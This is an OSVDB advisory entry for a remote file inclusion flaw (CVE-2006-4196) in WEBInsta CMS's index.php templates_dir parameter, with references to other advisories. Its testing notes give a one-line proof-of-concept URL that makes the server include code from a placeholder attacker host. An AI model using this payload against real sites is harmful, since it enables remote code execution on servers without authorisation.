WEBInsta CMS index.php templates_dir Variable Remote File Inclusion

2006-08-13T03:49:28
ID OSVDB:27948
Type osvdb
Reporter OSVDB
Modified 2006-08-13T03:49:28

Description

Manual Testing Notes

http://[target]/[webinstacms_path]/index.php?templates_dir=http://[attacker]/evil?

References:

Vendor URL: http://www.webinsta.com/cms.php
Secunia Advisory ID: 21463
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0260.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0020.html
Keyword: ECHO_ADV_45$2006
FrSIRT Advisory: ADV-2006-3276
CVE-2006-4196
Bugtraq ID: 19489